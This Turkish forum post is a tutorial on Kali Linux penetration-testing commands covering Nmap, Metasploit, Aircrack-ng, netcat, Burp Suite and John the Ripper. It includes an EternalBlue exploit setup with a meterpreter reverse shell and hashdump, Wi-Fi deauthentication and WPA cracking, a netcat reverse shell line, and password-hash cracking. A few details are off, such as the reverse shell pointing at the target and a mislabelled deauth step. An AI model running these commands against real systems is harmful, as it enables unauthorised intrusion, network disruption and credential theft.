Sızma Testi için Kullanılabilecek Kali Linux Komutları

  • Konbuyu başlatan Konbuyu başlatan Hüseyin
  • Başlangıç tarihi Başlangıç tarihi

Hüseyin

Üye
Top Poster Of Month
Katılım
21 Ocak 2024
Mesajlar
164
Tepkime puanı
36
Puanları
28
Hackerların tercih ettiği işletim sistemi olan Kali Linux, sistemleri test etmek ve güvenliğini sağlamak için birçok araç ve komut sunar. Temel komutlar yaygın olarak bilinse de, gelişmiş komutlarda uzmanlaşmak hacking ve sızma testlerinde performansınızı önemli ölçüde artırabilir.

1. Nmap: Gelişmiş Ağ Taraması

nmap.jpg


Nmap, bir bilgisayar ağındaki ana bilgisayarları ve hizmetleri keşfetmek ve böylece ağın bir “haritasını” oluşturmak için kullanılan güçlü bir ağ tarama aracıdır.

Gelişmiş Kullanım:​

Agresif Tarama ile İşletim Sistemi Algılama:
nmap -A -T4 target_ip

Belirli bir aralıktaki açık portları tespit edin:
nmap -p 1-65535 target_ip

Nmap betikleri (NSE) ile güvenlik açıklarını tarama:
nmap --script vuln target_ip

IPv6 Ağ Taraması:
nmap -6 target_ipv6

Açıklama:​

  • -A: İşletim sistemi algılamayı, sürüm algılamayı, komut dosyası taramayı ve traceroute'u etkinleştirir.
  • -T4: Tarama hızını artırır.
  • -p: Bir bağlantı noktası aralığı belirtir.
  • --script vuln: Güvenlik açıklarını bulmak için tasarlanmış bir dizi Nmap komut dosyası çalıştırır.
  • -6: IPv6 adreslerini tarar.

Kullanım Örneği:​

Bu komutlar genellikle bir sızma testinin keşif aşamasında hedefin işletim sistemleri, hizmetleri ve açık bağlantı noktaları hakkında bilgi toplamak için kullanılır.

2. Metasploit Framework: Gelişmiş Exploitation​

Metasploit Framework.png


Metasploit, hedef makinelere karşı exploit geliştirmek, test etmek ve çalıştırmak için sağlam bir çerçevedir.

Gelişmiş Kullanım:​

Belirli bir istismarı aratın:
search exploit name:ms17_010

Bir exploit yapılandırın ve çalıştırın:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST target_ip
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST your_ip

Post-exploitation modüllerini çalıştırma:
use post/windows/gather/hashdump

Açıklama:​

  • search: Anahtar kelimelere dayalı olarak belirli açıkları bulur.
  • use: Exploit modülünü seçin.
  • set: Exploit için seçenekleri yapılandırır (örn. hedef IP, payload).
  • exploit: Yapılandırılan exploit'i çalıştırır.
  • post: Hash toplama veya yetki yükseltme gibi exploit sonrası modülleri çalıştırır.

Kullanım Örneği:​

Bu komutlar, yetkisiz erişim elde etmek için exploit aşamasında ve daha fazla bilgi toplamak veya erişimi sürdürmek için post-exploitation'da kullanılır.

3. Aircrack-ng: Kablosuz Ağ Saldırısı​

Aircrack-ng.png


Aircrack-ng, WiFi ağ güvenliğini değerlendirmek için bir araç paketidir. WEP ve WPA-PSK anahtarlarının kırılmasına izin verir.

Gelişmiş Kullanım:​

İzleme modu ve paket yakalama:
airmon-ng start wlan0
airodump-ng wlan0mon

Kimlik doğrulama saldırısı:
aireplay-ng --deauth 10 -a router_bssid -c client_mac wlan0mon

WPA handshake'i kırma:
aircrack-ng -w /path/to/wordlist.txt -b router_bssid /path/to/capture.cap

Açıklama:​

  • airmon-ng start wlan0: Kablosuz bağdaştırıcıyı monitör moduna geçirir.
  • airodump-ng wlan0mon: Kablosuz ağdan gelen paketleri yakalar.
  • aireplay-ng --deauth: Bir istemciyi yeniden bağlanmaya zorlamak için kimlik doğrulama paketleri gönderir ve WPA handshake yakalar.
  • aircrack-ng -w: WPA handshake kaba kuvvetle gerçekleştirmek için bir wordlist kullanır.

Kullanım Örneği:​

Bu komutlar genellikle WiFi ağlarının güvenliğini değerlendirmek için kablosuz sızma testlerinde kullanılır.

4. Netcat​

netcat.jpg


Netcat (genellikle nc olarak kısaltılır), TCP veya UDP kullanarak ağ bağlantılarından okuyabilen ve ağ bağlantılarına yazabilen çok yönlü bir ağ aracıdır.

Gelişmiş Kullanım:​

Netcat ile port taraması:
nc -zv target_ip 20-80

Reverse shell oluşturma:
nc -e /bin/bash target_ip 4444

Dosyalar aktarma:
nc -lvp 4444 > received_file
nc target_ip 4444 < file_to_send

Açıklama:​

  • -z: Veri göndermeden bir tarama gerçekleştirir.
  • -v: Verbose modu.
  • -e: Hedefe bağlandıktan sonra bir program çalıştırır (örneğin, bir shell için /bin/bash ).
  • -lvp: Belirli bir bağlantı noktasını dinler ve bağlantıları bekler.

Kullanım Örneği:​

Netcat port tarama, arka kapı oluşturma, dosya transferi ve banner yakalama gibi çeşitli görevler için kullanılır.

5. Burp Suite: Gelişmiş Web Uygulaması Testi Aracı​

burp suite.png


Burp Suite, web uygulama güvenliğini test etmek için kapsamlı bir platformdur.

Gelişmiş Kullanım:​

Bir web uygulamasını tarama:
Tüm bağlantıların ve formların haritasını çıkarmak için Burp içindeki “Spider” aracını kullanın.

Fuzzing için Intruder:

Intruder modülüne istek gönderin.
Fuzzing için konumları yapılandırın (örn. parametre değerleri).
Bir payload listesi yükleyin ve saldırıyı başlatın.

Manuel test için Repeater:

Ele geçirilen herhangi bir isteği Repeater'a gönderin.
Parametreleri değiştirin ve yanıtları gözlemlemek için yeniden gönderin.

Açıklama​

  • Spider: Bir web uygulamasını tarama işlemini otomatikleştirir.
  • Intruder: Fuzzing ve brute-forcing gibi otomatik saldırılar gerçekleştirmenizi sağlar.
  • Repeater: Çeşitli senaryoları test etmek için HTTP isteklerini manuel olarak değiştirmenizi ve yeniden göndermenizi sağlar.

Kullanım Örneği:​

Burp Suite, SQL Injection, XSS ve daha fazlası gibi güvenlik açıklarını belirlemek için web uygulaması penetrasyon testleri sırasında kullanılır.

6. John the Ripper: Şifre Kırma​

johntheripper.png


John the Ripper, öncelikle zayıf şifreleri belirlemek için kullanılan hızlı bir şifre kırma aracıdır.

Gelişmiş Kullanım:​

Parola hach kırma:
john --wordlist=/path/to/wordlist.txt /path/to/hashfile

Artımlı kaba kuvvet saldırısı:
john --incremental /path/to/hashfile

Kırılmış parolaları gösterir:
john --show /path/to/hashfile

Açıklama:​

  • --wordlist: Sözlük saldırıları için kullanılacak sözlük listesini belirtir.
  • --incremental: Tüm olası kombinasyonları kullanarak bir kaba kuvvet saldırısı çalıştırır.
  • --show: Kırılmış parolaları görüntüler.

Kullanım Örneği:​

John the Ripper, ele geçirilmiş sistemlerden elde edilen parola karmalarını kırmak için ele geçirme sonrası aşamada kullanılır.
 
Geri
Üst